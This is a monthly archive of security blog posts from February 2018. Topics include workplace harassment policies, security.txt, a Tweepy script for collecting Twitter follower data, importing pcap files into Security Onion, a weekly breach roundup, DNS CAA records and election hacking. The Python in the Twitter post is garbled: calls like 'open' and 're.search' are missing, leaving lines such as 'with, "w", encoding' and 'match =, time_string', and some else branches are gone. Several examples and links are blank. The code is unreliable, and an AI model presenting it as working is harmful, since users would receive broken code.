Monthly Archives: February 2018

#MeToo Prompts Employers to Review their Anti-Harassment Policies

Comprehensive anti-harassment policies are even more important in light of #MeToo movement

The #MeToo movement, which was birthed in the wake of sexual abuse allegations against Hollywood mogul Harvey Weinstein, has shined a spotlight on the epidemic of sexual harassment and discrimination in the U.S. According to a nationwide survey by Stop Street Harassment, a staggering 81% of women and 43% of men have experienced some form of sexual harassment or assault in their lifetimes, with 38% of women and 13% of men reporting that they have been harassed at their workplaces.

#MeToo Prompts Employers to Review their Anti-Harassment Policies

Because of the astounding success of #MeToo – the “Silence Breakers” were named Time magazine’s Person of the Year in 2017 – businesses are bracing for a significant uptick in sexual harassment complaints in 2018. Insurers that offer employment practices liability coverage are expecting #MeToo to result in more claims as well. Forbes reports that they are raising some organizations’ premiums and deductibles (particularly in industries where it’s common for high-paid men to supervise low-paid women), refusing to cover some companies at all, and insisting that all insured companies have updated, comprehensive anti-harassment policies and procedures in place.

In addition to legal liability and difficulty obtaining affordable insurance, sexual harassment claims can irrevocably damage an organization’s reputation and make it difficult to attract the best talent. Not to mention, doing everything you can to prevent a hostile work environment is simply the right thing to do. Every company with employees should have an anti-harassment policy in place, and it should be regularly reviewed and updated as the organization and the legal landscape evolve.

Tips for a Good Anti-Harassment Policy

While the exact details will vary from workplace to workplace, in general, an anti-harassment policy should be written in straightforward, easy-to-understand language and include the following:

  • Real-life examples of inappropriate conduct, including in-person, over the phone, and through texts and email.
  • Clearly defined potential penalties for violating the policy.
  • A clearly defined formal complaint process with multiple channels for employees to make reports.
  • A no-retaliation clause assuring employees that they will not be disciplined for complaining about harassment.

In addition to having a formal anti-harassment policy, organizations must demonstrate their commitment to a harassment-free workplace by providing their employees with regular anti-harassment training, creating a “culture of compliance” from the top down, and following up with victimized employees after a complaint has been made to inform them on the status of the investigation and ensure that they have not been retaliated against.

Continuum GRC proudly supports the values of the #MeToo movement. We feel that sexual harassment and discrimination have no place in the workplace. In support of #MeToo, we are offering organizations, free of charge, a custom anti-harassment policy software module powered by our award-winning IT Audit Machine GRC software. Click here to create your FREE Policy Machine account and get started. Your free ITAM module will automate the process and walk you through the creation of your customized anti-harassment policy, step by step. Then, ITAM will act as a centralized repository of your anti-harassment compliance information moving forward, so that you can easily review and adjust your policies and procedures as needed.

The cyber security experts at Continuum GRC have deep knowledge of the cyber security field, are continually monitoring the latest information security threats, and are committed to protecting your organization from security breaches. Continuum GRC offers full-service and in-house risk assessment and risk management subscriptions, and we help companies all around the world sustain proactive cyber security programs.

Continuum GRC is proactive cyber security®. Call 1-888-896-6207 to discuss your organization’s cyber security needs and find out how we can help your organization protect its systems and ensure compliance.

The post #MeToo Prompts Employers to Review their Anti-Harassment Policies appeared first on .

Implement “security.txt” to advocate responsible vuln. disclosures


After discussing CAA record in DNS to whitelist your certificate authorities in my previous article, do you know it's a matter of time that someone finds an issue with your web-presence, website or any front-facing application? If they do, what do you expect them to do? Keep it under the wrap, or disclose it to you "responsibly"? This article is for you if you advocate the responsible disclosure; else, you have to do catch up with reality (I shall come back to you later!). Now, while we are on responsible disclosure, the "well-behaved" hackers or security researchers can either reach you via bug-bounty channels, your info@example email (not recommended), social media, or would be struggling to find a secure channel. But, what if you have a way to broadcast your "security channel" details to ease out their communication, and provide them with a well documented, managed and sought out conversation channel? Isn't that cool? Voila, so what robots.txt is to search engines, security.txt is to security researchers!

I know you might be thinking, "...what if I have a page on my website which lists the security contacts?." But, where would you host this page - under contact-us, security, information, about-us etc.? This is the very issue that security.txt evangelists are trying to solve - standardize the file, path and it's presence as part of RFC 5785. As per their website,

Security.txt defines a standard to help organizations define the process for security researchers to disclose security vulnerabilities securely.

The project is still in early stages[1], but is already receiving positive feedback from the security community, and big tech players like Google[2] have incorporated it as well. In my opinion, it very well advocates that you take security seriously, and are ready to have an open conversation with the security community if they want to report a finding, vulnerability or a security issue with your website/ application. By all means, it sends a positive message!

Semantics/format of "security.txt"

As the security.txt follows a standard here are some points to consider,

  • The file security.txt has to be placed in .well-known directory under your domain parent directory, i.e.
  • It documents the following fields,
    • Comments: The file can have information in the comment section that is optional. The comments shall begin with # symbol.
    • Each separate field needs a new line to define and represent.
    • Contact: This field can be an email address, phone or a link to a page where a security researcher can contact you. This field is mandatory and MUST be available in the file. It should adhere to RFC3986[3] for the syntax of email, phone and URI (MUST be served over HTTPS). Possible examples are,
      Contact: tel:+1-201-555-0123
    • Encryption: This directive should link to your encryption key if you expect the researcher to encrypt the communication. It MUST NOT be the key, but a URI to the key-file.
    • Signature: If you want to show the file integrity, you can use this directive to link to the signature of the file. Each of the signature files must be named as security.txt.sig and accessible at /.well-known/ path.
    • Policy: You can use this directive to link to your "security policy".
    • Acknowledgement: This derivative can be used to acknowledge the previous researchers, and findings. It should contain company and individual names.
    • Hiring: Wanna hire people? Then, this is the place you post.

A reference security.txt extracted from Google,


Hope this articles gives you an idea of implementing security.txt file, and the very importance of it.

Stay safe!

  1. Early drafted posted for RFC review: ↩︎

  2. Google security.txt file: ↩︎

  3. Uniform Resource Identifier: ↩︎

How To Get Twitter Follower Data Using Python And Tweepy

In January 2018, I wrote a couple of blog posts outlining some analysis I’d performed on followers of popular Finnish Twitter profiles. A few people asked that I share the tools used to perform that research. Today, I’ll share a tool similar to the one I used to conduct that research, and at the same time, illustrate how to obtain data about a Twitter account’s followers.

This tool uses Tweepy to connect to the Twitter API. In order to enumerate a target account’s followers, I like to start by using Tweepy’s followers_ids() function to get a list of Twitter ids of accounts that are following the target account. This call completes in a single query, and gives us a list of Twitter ids that can be saved for later use (since both screen_name and name an be changed, but the account’s id never changes). Once I’ve obtained a list of Twitter ids, I can use Tweepy’s lookup_users(userids=batch) to obtain Twitter User objects for each Twitter id. As far as I know, this isn’t exactly the documented way of obtaining this data, but it suits my needs. /shrug

Once a full set of Twitter User objects has been obtained, we can perform analysis on it. In the following tool, I chose to look at the account age and friends_count of each account returned, print a summary, and save a summarized form of each account’s details as json, for potential further processing. Here’s the full code:

from tweepy import OAuthHandler
from tweepy import API
from collections import Counter
from datetime import datetime, date, time, timedelta
import sys
import json
import os
import io
import re
import time

# Helper functions to load and save intermediate steps
def save_json(variable, filename):
    with, "w", encoding="utf-8") as f:
        f.write(unicode(json.dumps(variable, indent=4, ensure_ascii=False)))

def load_json(filename):
    ret = None
    if os.path.exists(filename):
            with, "r", encoding="utf-8") as f:
                ret = json.load(f)
    return ret

def try_load_or_process(filename, processor_fn, function_arg):
    load_fn = None
    save_fn = None
    if filename.endswith("json"):
        load_fn = load_json
        save_fn = save_json
        load_fn = load_bin
        save_fn = save_bin
    if os.path.exists(filename):
        print("Loading " + filename)
        return load_fn(filename)
        ret = processor_fn(function_arg)
        print("Saving " + filename)
        save_fn(ret, filename)
        return ret

# Some helper functions to convert between different time formats and perform date calculations
def twitter_time_to_object(time_string):
    twitter_format = "%a %b %d %H:%M:%S %Y"
    match_expression = "^(.+)\s(\+[0-9][0-9][0-9][0-9])\s([0-9][0-9][0-9][0-9])$"
    match =, time_string)
    if match is not None:
        first_bit =
        second_bit =
        last_bit =
        new_string = first_bit + " " + last_bit
        date_object = datetime.strptime(new_string, twitter_format)
        return date_object

def time_object_to_unix(time_object):
    return int(time_object.strftime("%s"))

def twitter_time_to_unix(time_string):
    return time_object_to_unix(twitter_time_to_object(time_string))

def seconds_since_twitter_time(time_string):
    input_time_unix = int(twitter_time_to_unix(time_string))
    current_time_unix = int(get_utc_unix_time())
    return current_time_unix - input_time_unix

def get_utc_unix_time():
    dts = datetime.utcnow()
    return time.mktime(dts.timetuple())

# Get a list of follower ids for the target account
def get_follower_ids(target):
    return auth_api.followers_ids(target)

# Twitter API allows us to batch query 100 accounts at a time
# So we'll create batches of 100 follower ids and gather Twitter User objects for each batch
def get_user_objects(follower_ids):
    batch_len = 100
    num_batches = len(follower_ids) / 100
    batches = (follower_ids[i:i+batch_len] for i in range(0, len(follower_ids), batch_len))
    all_data = []
    for batch_count, batch in enumerate(batches):
        sys.stdout.write("Fetching batch: " + str(batch_count) + "/" + str(num_batches))
        users_list = auth_api.lookup_users(user_ids=batch)
        users_json = (map(lambda t: t._json, users_list))
        all_data += users_json
    return all_data

# Creates one week length ranges and finds items that fit into those range boundaries
def make_ranges(user_data, num_ranges=20):
    range_max = 604800 * num_ranges
    range_step = range_max/num_ranges

# We create ranges and labels first and then iterate these when going through the whole list
# of user data, to speed things up
    ranges = {}
    labels = {}
    for x in range(num_ranges):
        start_range = x * range_step
        end_range = x * range_step + range_step
        label = "%02d" % x + " - " + "%02d" % (x+1) + " weeks"
        labels[label] = []
        ranges[label] = {}
        ranges[label]["start"] = start_range
        ranges[label]["end"] = end_range
    for user in user_data:
        if "created_at" in user:
            account_age = seconds_since_twitter_time(user["created_at"])
            for label, timestamps in ranges.iteritems():
                if account_age > timestamps["start"] and account_age < timestamps["end"]:
                    entry = {} 
                    id_str = user["id_str"] 
                    entry[id_str] = {} 
                    fields = ["screen_name", "name", "created_at", "friends_count", "followers_count", "favourites_count", "statuses_count"] 
                    for f in fields: 
                        if f in user: 
                            entry[id_str][f] = user[f] 
    return labels

if __name__ == "__main__": 
    account_list = [] 
    if (len(sys.argv) > 1):
        account_list = sys.argv[1:]

    if len(account_list) < 1:
        print("No parameters supplied. Exiting.")


    auth = OAuthHandler(consumer_key, consumer_secret)
    auth.set_access_token(access_token, access_token_secret)
    auth_api = API(auth)

    for target in account_list:
        print("Processing target: " + target)

# Get a list of Twitter ids for followers of target account and save it
        filename = target + "_follower_ids.json"
        follower_ids = try_load_or_process(filename, get_follower_ids, target)

# Fetch Twitter User objects from each Twitter id found and save the data
        filename = target + "_followers.json"
        user_objects = try_load_or_process(filename, get_user_objects, follower_ids)
        total_objects = len(user_objects)

# Record a few details about each account that falls between specified age ranges
        ranges = make_ranges(user_objects)
        filename = target + "_ranges.json"
        save_json(ranges, filename)

# Print a few summaries
        print("\t\tFollower age ranges")
        total = 0
        following_counter = Counter()
        for label, entries in sorted(ranges.iteritems()):
            print("\t\t" + str(len(entries)) + " accounts were created within " + label)
            total += len(entries)
            for entry in entries:
                for id_str, values in entry.iteritems():
                    if "friends_count" in values:
                        following_counter[values["friends_count"]] += 1
        print("\t\tTotal: " + str(total) + "/" + str(total_objects))
        print("\t\tMost common friends counts")
        total = 0
        for num, count in following_counter.most_common(20):
            total += count
            print("\t\t" + str(count) + " accounts are following " + str(num) + " accounts")
        print("\t\tTotal: " + str(total) + "/" + str(total_objects))

Let’s run this tool against a few accounts and see what results we get. First up: @realDonaldTrump


Age ranges of new accounts following @realDonaldTrump

As we can see, over 80% of @realDonaldTrump’s last 5000 followers are very new accounts (less than 20 weeks old), with a majority of those being under a week old. Here’s the top friends_count values of those accounts:


Most common friends_count values seen amongst the new accounts following @realDonaldTrump

No obvious pattern is present in this data.

Next up, an account I looked at in a previous blog post – @niinisto (the president of Finland).

Age ranges of new accounts following @niinisto

Many of @niinisto’s last 5000 followers are new Twitter accounts. However, not in as large of a proportion as in the @realDonaldTrump case. In both of the above cases, this is to be expected, since both accounts are recommended to new users of Twitter. Let’s look at the friends_count values for the above set.

Most common friends_count values seen amongst the new accounts following @niinisto

In some cases, clicking through the creation of a new Twitter account (next, next, next, finish) will create an account that follows 21 Twitter profiles. This can explain the high proportion of accounts in this list with a friends_count value of 21. However, we might expect to see the same (or an even stronger) pattern with the @realDonaldTrump account. And we’re not. I’m not sure why this is the case, but it could be that Twitter has some automation in place to auto-delete programmatically created accounts. If you look at the output of my script you’ll see that between fetching the list of Twitter ids for the last 5000 followers of @realDonaldTrump, and fetching the full Twitter User objects for those ids, 3 accounts “went missing” (and hence the tool only collected data for 4997 accounts.)

Finally, just for good measure, I ran the tool against my own account (@r0zetta).

Age ranges of new accounts following @r0zetta

Here you see a distribution that’s probably common for non-celebrity Twitter accounts. Not many of my followers have new accounts. What’s more, there’s absolutely no pattern in the friends_count values of these accounts:

Most common friends_count values seen amongst the new accounts following @r0zetta

Of course, there are plenty of other interesting analyses that can be performed on the data collected by this tool. Once the script has been run, all data is saved on disk as json files, so you can process it to your heart’s content without having to run additional queries against Twitter’s servers. As usual, have fun extending this tool to your own needs, and if you’re interested in reading some of my other guides or analyses, here’s full list of those articles.

Wizards of Entrepreneurship – Business Security Weekly #75

This week, Michael is joined by Matt Alderman to interview Will Lin, Principal and Founding Investor at Trident Capital Security! In the Security News, Apptio raised $4.6M in Equity, Morphisec raised $12M in Series B, & Dover Microsystems raised $6M "Seed" Round! Last but not least, part two of our second feature interview with Sean D'Souza, author of The Brain Audit! All that and more, on this episode of Business Security Weekly!

Full Show Notes:


Visit for all the latest episodes!

Importing Pcap into Security Onion

Within the last week, Doug Burks of Security Onion (SO) added a new script that revolutionizes the use case for his amazing open source network security monitoring platform.

I have always used SO in a live production mode, meaning I deploy a SO sensor sniffing a live network interface. As the multitude of SO components observe network traffic, they generate, store, and display various forms of NSM data for use by analysts.

The problem with this model is that it could not be used for processing stored network traffic. If one simply replayed the traffic from a .pcap file, the new traffic would be assigned contemporary timestamps by the various tools observing the traffic.

While all of the NSM tools in SO have the independent capability to read stored .pcap files, there was no unified way to integrate their output into the SO platform.

Therefore, for years, there has not been a way to import .pcap files into SO -- until last week!

Here is how I tested the new so-import-pcap script. First, I made sure I was running Security Onion Elastic Stack Release Candidate 2 ( ISO) or later. Next I downloaded the script using wget from

I continued as follows:

richard@so1:~$ sudo cp so-import-pcap /usr/sbin/

richard@so1:~$ sudo chmod 755 /usr/sbin/so-import-pcap

I tried running the script against two of the sample files packaged with SO, but ran into issues with both.

richard@so1:~$ sudo so-import-pcap /opt/samples/10k.pcap


Please wait while...
...creating temp pcap for processing.
mergecap: Error reading /opt/samples/10k.pcap: The file appears to be damaged or corrupt
(pcap: File has 263718464-byte packet, bigger than maximum of 262144)
Error while merging!

I checked the file with capinfos.

richard@so1:~$ capinfos /opt/samples/10k.pcap
capinfos: An error occurred after reading 17046 packets from "/opt/samples/10k.pcap": The file appears to be damaged or corrupt.
(pcap: File has 263718464-byte packet, bigger than maximum of 262144)

Capinfos confirmed the problem. Let's try another!

richard@so1:~$ sudo so-import-pcap /opt/samples/zeus-sample-1.pcap


Please wait while...
...creating temp pcap for processing.
mergecap: Error reading /opt/samples/zeus-sample-1.pcap: The file appears to be damaged or corrupt
(pcap: File has 1984391168-byte packet, bigger than maximum of 262144)
Error while merging!

Another bad file. Trying a third!

richard@so1:~$ sudo so-import-pcap /opt/samples/evidence03.pcap


Please wait while...
...creating temp pcap for processing.
...setting sguild debug to 2 and restarting sguild.
...configuring syslog-ng to pick up sguild logs.
...disabling syslog output in barnyard.
...configuring logstash to parse sguild logs (this may take a few minutes, but should only need to be done once)...done.
...stopping curator.
...disabling curator.
...stopping ossec_agent.
...disabling ossec_agent.
...stopping Bro sniffing process.
...disabling Bro sniffing process.
...stopping IDS sniffing process.
...disabling IDS sniffing process.
...stopping netsniff-ng.
...disabling netsniff-ng.
...adjusting CapMe to allow pcaps up to 50 years old.
...analyzing traffic with Snort.
...analyzing traffic with Bro.
...writing /nsm/sensor_data/so1-eth1/dailylogs/2009-12-28/snort.log.1261958400

Import complete!

You can use this hyperlink to view data in the time range of your import:

or you can manually set your Time Range to be:
From: 2009-12-28    To: 2009-12-29

Incidentally here is the capinfos output for this trace.

richard@so1:~$ capinfos /opt/samples/evidence03.pcap
File name:           /opt/samples/evidence03.pcap
File type:           Wireshark/tcpdump/... - pcap
File encapsulation:  Ethernet
Packet size limit:   file hdr: 65535 bytes
Number of packets:   1778
File size:           1537 kB
Data size:           1508 kB
Capture duration:    171 seconds
Start time:          Mon Dec 28 04:08:01 2009
End time:            Mon Dec 28 04:10:52 2009
Data byte rate:      8814 bytes/s
Data bit rate:       70 kbps
Average packet size: 848.57 bytes
Average packet rate: 10 packets/sec
SHA1:                34e5369c8151cf11a48732fed82f690c79d2b253
RIPEMD160:           afb2a911b4b3e38bc2967a9129f0a11639ebe97f
MD5:                 f8a01fbe84ef960d7cbd793e0c52a6c9
Strict time order:   True

That worked! Now to see what I can find in the SO interface.

I accessed the Kibana application and changed the timeframe to include those in the trace.

Here's another screenshot. Again I had to adjust for the proper time range.

Very cool! However, I did not find any IDS alerts. This made me wonder if there was a problem with alert processing. I decided to run the script on a new .pcap:

richard@so1:~$ sudo so-import-pcap /opt/samples/emerging-all.pcap


Please wait while...
...creating temp pcap for processing.
...analyzing traffic with Snort.
...analyzing traffic with Bro.
...writing /nsm/sensor_data/so1-eth1/dailylogs/2010-01-27/snort.log.1264550400

Import complete!

You can use this hyperlink to view data in the time range of your import:

or you can manually set your Time Range to be:
From: 2010-01-27    To: 2010-01-28

When I searched the interface for NIDS alerts (after adjusting the time range), I found results:

The alerts show up in Sguil, too!

This is a wonderful development for the Security Onion community. Being able to import .pcap files and analyze them with the standard SO tools and processes, while preserving timestamps, makes SO a viable network forensics platform.

This thread in the mailing list is covering the new script.

I suggest running on an evaluation system, probably in a virtual machine. I did all my testing on Virtual Box. Check it out! 

Weekly Cyber Risk Roundup: W-2 Theft, BEC Scams, and SEC Guidance

The FBI is once again warning organizations that there has been an increase in phishing campaigns targeting employee W-2 information. In addition, this week saw new breach notifications related to W-2 theft, as well as reports of a threat actor targeting Fortune 500 companies with business email compromise (BEC) scams in order to steal millions of dollars.

The recent breach notification from Los Angeles Philharmonic highlights how W-2 information is often targeted during the tax season: attackers impersonated the organization’s chief financial officer via what appeared to be a legitimate email address and requested that the W-2 information for every employee be forwarded.

“The most popular method remains impersonating an executive, either through a compromised or spoofed email in order to obtain W-2 information from a Human Resource (HR) professional within the same organization,” the FBI noted in its alert on W-2 phishing scams.

In addition, researchers said that a threat actor, which is likely of Nigerian origin, has been successfully targeting accounts payable personnel at some Fortune 500 companies to initiate fraudulent wire transfers and steal millions of dollars. The examples observed by the researchers highlight “how attackers used stolen email credentials and sophisticated social engineering tactics without compromising the corporate network to defraud a company.”

The recent discoveries highlight the importance of protecting against BEC and other types of phishing scams. The FBI advises that the key to reducing the risk is understanding the criminals’ techniques and deploying effective mitigation processes, such as:

  • limiting the number of employees who have authority to approve wire transfers or share employee and customer data;
  • requiring another layer of approval such as a phone call, PIN, one-time code, or dual approval to verify identities before sensitive requests such as changing the payment information of vendors is confirmed;
  • and delaying transactions until additional verification processes can be performed.


Other trending cybercrime events from the week include:

  • Spyware companies hacked: A hacker has breached two different spyware companies, Mobistealth and Spy Master Pro, and provided gigabytes of stolen data to Motherboard. Motherboard reported that the data contained customer records, apparent business information, and alleged intercepted messages of some people targeted by the malware.
  • Data accidentally exposed: The University of Wisconsin – Superior Alumni Association is notifying alumni that their Social Security numbers may have been exposed due to the ID numbers for some individuals being the same as their Social Security numbers and those ID numbers being shared with a travel vendor. More than 70 residents of the city of Ballarat had their personal information posted online when an attachment containing a list of individuals who had made submissions to the review of City of Ballarat’s CBD Car Parking Action Plan was posted online unredacted. Chase said that a “glitch” led to some customers’ personal information being displayed on other customers’ accounts.
  • Notable data breaches: The compromise of a senior moderator’s account at the HardwareZone Forum led to a breach affecting 685,000 user profiles, the site’s owner said. White and Bright Family Dental is notifying patients that it discovered unauthorized access to a server that contained patient personal information. The University of Virginia Health System is notifying 1,882 patients that their medical records may have been accessed due to discovering malware on a physician’s device. HomeTown Bank in Texas is notifying customers that it discovered a skimming device installed on an ATM at its Galveston branch.
  • Other notable events: The Colorado Department of Transportation said that its Windows computers were infected with SamSam ransomware and that more than 2,000 computers were shut down to stop the ransomware from spreading and investigate the attack. The city of Allentown, Pennsylvania, said it is investigating the discovery of malware on its systems, but there is no reason to believe personal data has been compromised. Harper’s Magazine is warning its subscribers that their credentials may have been compromised.

SurfWatch Labs collected data on many different companies tied to cybercrime over the past week. Some of the top trending targets are shown in the chart below.


Cyber Risk Trends From the Past Week


The U.S. Securities and Exchange Commission (SEC) issued updated guidance on how public organizations should respond to data breaches and other cybersecurity issues last week.

The document, titled “Commission Statement and Guidance on Public Company Cybersecurity Disclosures,” states that “it is critical that public companies take all required actions to inform investors about material cybersecurity risks and incidents in a timely fashion, including those companies that are subject to material cybersecurity risks but may not yet have been the target of a cyber-attack.”

The SEC also advised that directors, officers, and other corporate insiders should not trade a public company’s securities if they are in possession of material nonpublic information — an issue that arose when it was reported that several Equifax executives sold shares in the days following the company’s massive data breach. The SEC said that public companies should have policies and procedures in place to prevent insiders from taking advantage of insider knowledge of cybersecurity incidents, as well as to ensure a timely disclosure of any related material nonpublic information.

“I believe that providing the Commission’s views on these matters will promote clearer and more robust disclosure by companies about cybersecurity risks and incidents, resulting in more complete information being available to investors,” said SEC Chairman Jay Clayton.  “In particular, I urge public companies to examine their controls and procedures, with not only their securities law disclosure obligations in mind, but also reputational considerations around sales of securities by executives.”

The SEC unanimously approved the updated guidance; however, Reuters reported that there was reluctant support from democrats on the commission who were calling for much more rigorous rulemaking to be put in place.

Ground Control to Major Thom

I recently finished a book called “Into the Black” by Roland White, charting the birth of the space shuttle from the beginnings of the space race through to it’s untimely retirement. It is a fascinating account of why “space is hard” and exemplifies the need for compromise and balance of risks in even the harshest … Read More

Improving Caching Strategies With SSICLOPS

F-Secure development teams participate in a variety of academic and industrial collaboration projects. Recently, we’ve been actively involved in a project codenamed SSICLOPS. This project has been running for three years, and has been a joint collaboration between ten industry partners and academic entities. Here’s the official description of the project.

The Scalable and Secure Infrastructures for Cloud Operations (SSICLOPS, pronounced “cyclops”) project focuses on techniques for the management of federated cloud infrastructures, in particular cloud networking techniques within software-defined data centres and across wide-area networks. SSICLOPS is funded by the European Commission under the Horizon2020 programme ( The project brings together industrial and academic partners from Finland, Germany, Italy, the Netherlands, Poland, Romania, Switzerland, and the UK.

The primary goal of the SSICLOPS project is to empower enterprises to create and operate high-performance private cloud infrastructure that allows flexible scaling through federation with other clouds without compromising on their service level and security requirements. SSICLOPS federation supports the efficient integration of clouds, no matter if they are geographically collocated or spread out, belong to the same or different administrative entities or jurisdictions: in all cases, SSICLOPS delivers maximum performance for inter-cloud communication, enforce legal and security constraints, and minimize the overall resource consumption. In such a federation, individual enterprises will be able to dynamically scale in/out their cloud services: because they dynamically offer own spare resources (when available) and take in resources from others when needed. This allows maximizing own infrastructure utilization while minimizing excess capacity needs for each federation member.

Many of our systems (both backend and on endpoints) rely on the ability to quickly query the reputation and metadata of objects from a centrally maintained repository. Reputation queries of this type are served either directly from the central repository, or through one of many geographically distributed proxy nodes. When a query is made to a proxy node, if the required verdicts don’t exist in that proxy’s cache, the proxy queries the central repository, and then delivers the result. Since reputation queries need to be low-latency, the additional hop from proxy to central repository slows down response times.

In the scope of the SSICLOPS project, we evaluated a number of potential improvements to this content distribution network. Our aim was to reduce the number of queries from proxy nodes to the central repository, by improving caching mechanisms for use cases where the set of the most frequently accessed items is highly dynamic. We also looked into improving the speed of communications between nodes via protocol adjustments. Most of this work was done in cooperation with Deutsche Telecom and Aalto University.

The original implementation of our proxy nodes used a Least Recently Used (LRU) caching mechanism to determine which cached items should be discarded. Since our reputation verdicts have time-to-live values associated with them, these values were also taken into account in our original algorithm.

Hit Rate Results

Initial tests performed in October 2017 indicated that SG-LRU outperformed LRU on our dataset

During the project, we worked with Gerhard Hasslinger’s team at Deutsch Telecom to evaluate whether alternate caching strategies might improve the performance of our reputation lookup service. We found that Score-Gated LRU / Least Frequently Used (LFU) strategies outperformed our original LRU implementation. Based on the conclusions of this research, we have decided to implement a windowed LFU caching strategy, with some limited “predictive” features for determining which items might be queried in the future. The results look promising, and we’re planning on bringing the new mechanism into our production proxy nodes in the near future.


SG-LRU exploits the focus on top-k requests by keeping most top-k objects in the cache

The work done in SSICLOPS will serve as a foundation for the future optimization of content distribution strategies in many of F-Secure’s services, and we’d like to thank everyone who worked with us on this successful project!

Restrict Certificate Authorities (CA) to issue SSL certs. Enable CAA record in DNS

Restrict Certificate Authorities (CA) to issue SSL certs. Enable CAA record in DNS

It's been a long time since I audited someone's DNS file but recently while checking a client's DNS configuration I was surprised that the CAA records were set randomly "so to speak". I discussed with the administrator and was surprised to see that he has no clue of CAA, how it works and why is it so important to enable it correctly. That made me wonder, how many of us actually know that; and how can it be a savior if someone attempts to get SSL certificate for your domain.

What is CAA?

CAA or Certificate Authority Authorization is a record that identifies which CA (certificate authorities) are allowed to issue certificate for the domain in question. It is declared via CAA type in the DNS records which is publicly viewable, and can be verified before issuing certificate by a certificate authority.

Brief Background

While the first draft was documented by Phillip Hallem-Baker and Rob Stradling back in 2010, it accelerated the work in last 5 years due to issues with CA and hacks around. The first CA subversion was in 2001 when VeriSign issued 2 certificates to an individual claiming to represent Microsoft; these were named "Microsoft Corporation". These certificate(s) could have been used to spoof identity, and providing malicious updates etc. Further in 2011 fraudelent certificates were issued by Comodo[1] and DigiNotar[2] after being attacked by Iranian hackers (more on Comodo attack, and dutch DigiNotar attack); an evidence of their use in a MITM attack in Iran.

Further in 2012 Trustwave issued[3] a sub-root certificate that was used to sniff SSL traffic in the name of transparent traffic management. So, it's time CA are restricted or whitelisted at domain level.

What if no CAA record is configured in DNS?

Simply put the CAA record shall be configured to announce which CA (certificate authorities) are permitted to issue a certificate for your domain. Wherein, if no CAA record is provided, any CA can issue a certificate for your domain.

CAA is a good practice to restrict your CA presence, and their power(s) to legally issue certificate for your domain. It's like whitelisting them in your domain!

The process mandates a Certificate Authority[4] (yes, it mandates now!) to query DNS for your CAA record, and the certificate can only be issued for your hostname, if either no record is available, or this CA has been "whitelisted". The CAA record enables the rules for the parent domain, and the same are inherited by sub-domains. (unless otherwise stated in DNS records).

Certificates authorities interpret the lack of a CAA record to authorize unrestricted issuance, and the presence of a single blank issue tag to disallow all issuance.[5]

CAA record syntax/ format

The CAA record has the following format: <flag> <tag> <value> and has the following meaning,

Tag Name Usage
flag This is an integer flag with values 1-255 as defined in the RFC 6844[6]. It is currently used to call the critical flag.[7]
tag This is an ASCII string (issue, issuewild, iodef) which identifies the property represented by the record policy.
value The value of the property defined in the <tag>

The tags defined in the RFC have the following meaning and understanding with the CA records,

  • issue: Explicitly authorizes a "single certificate authority" to issue any type of certificate for the domain in scope.
  • issuewild: Explicitly authorizes a "single certificate authority" to issue only a wildcard certificate for the domain in scope.
  • iodef: certificate authorities will report the violations accordingly if the certificate is issued, or requested that breach the CAA policy defined in the DNS records. (options: mailto:, http:// or https://)
DNS Software Support

As per excerpt from Wikipedia[8]: CAA records are supported by BIND (since version 9.10.1B),Knot DNS (since version 2.2.0), ldns (since version 1.6.17), NSD (as of version 4.0.1), OpenDNSSEC, PowerDNS (since version 4.0.0), Simple DNS Plus (since version 6.0), tinydns and Windows Server 2016.
Many hosted DNS providers also support CAA records, including Amazon Route 53, Cloudflare, DNS Made Easy and Google Cloud DNS.

Example: (my own website DNS)

As per the policy, I have configured that ONLY "" but due to Cloudflare Universal SSL support, the following certificate authorities get configured as well,

  • 0 issue ""
  • 0 issue ""
  • 0 issue ""
  • 0 issuewild ""
  • 0 issuewild ""
  • 0 issuewild ""

Restrict Certificate Authorities (CA) to issue SSL certs. Enable CAA record in DNS

Also, configured iodef for violation: 0 iodef ""

How's the WWW doing with CAA?

After the auditing exercise I was curious to know how are top 10,000 alexa websites doing with CAA and strangely enough I was surprised with the results: only 4% of top 10K websites have CAA DNS record.

Restrict Certificate Authorities (CA) to issue SSL certs. Enable CAA record in DNS

[Update 27-Feb-18]: This pie chart was updated with correct numbers. Thanks to Ich Bin Niche Sie for identifying the calculation error.

Now, we have still a long way to go with new security flags and policies like "CAA DNS Record", "security.txt" file etc. and I shall be covering these topics continuously to evangelize security in all possible means without disrupting business. Remember to always work hand in hand with the business.

Stay safe, and tuned in.

  1. Comodo CA attack by Iranian hackers: ↩︎

  2. Dutch DigiNotar attack by Iranian hackers: ↩︎

  3. Trustwave Subroot Certificate: ↩︎

  4. CAA Checking Mandatory (Ballot 187 results) 2017: ↩︎

  5. Wikipedia Article: ↩︎

  6. IETF RFC 6844 on CAA record: ↩︎

  7. The confusion of critical flag: ↩︎

  8. Wikipedia Support Section: ↩︎

“Know Thyself Better Than The Adversary – ICS Asset Identification and Tracking”

Know Thyself Better Than The Adversary - ICS Asset Identification &amp; Tracking This blog was written by Dean Parsons. As SANS prepares for the 2018 ICS Summit in Orlando, Dean Parsons is preparing a SANS ICS Webcast to precede the event, a Summit talk, and a SANS@Night presentation. In this blog, Dean tackles some common &hellip; Continue reading Know Thyself Better Than The Adversary - ICS Asset Identification and Tracking

States Worry About Election Hacking as Midterms Approach

Mueller indictments of Russian cyber criminals put election hacking at top of mind

State officials expressed grave concerns about election hacking the day after Special Counsel Robert Mueller handed down indictments of 13 Russian nationals on charges of interfering with the 2016 presidential election. The Washington Post reports:

At a conference of state secretaries of state in Washington, several officials said the government was slow to share information about specific threats faced by states during the 2016 election. According to the Department of Homeland Security, Russian government hackers tried to gain access to voter registration files or public election sites in 21 states.

Although the hackers are not believed to have manipulated or removed data from state systems, experts worry that the attackers might be more successful this year. And state officials say reticence on the part of Homeland Security to share sensitive information about the incidents could hamper efforts to prepare for the midterms.

Mueller indictments of Russian cyber criminals put election hacking at top of mind

Granted, the Mueller indictments allege disinformation and propaganda-spreading using social media, not direct election hacking. However, taken together with the attacks on state elections systems, it is now indisputable that Russian cyber criminals used a highly sophisticated, multi-pronged approach to tamper with the 2016 election. While there have been no reported attacks on state systems since, there is no reason to believe that election hacking attempts by Russians or other foreign threat actors will simply cease; if anything, cyber criminals are likely to step up their game during the critical 2018 midterms this November.

These aren’t new issues; cyber security was a top issue leading up to the 2016 election. Everyone agreed then, and everyone continues to agree now, that more needs to be done to prevent election hacking. So, what’s the holdup?

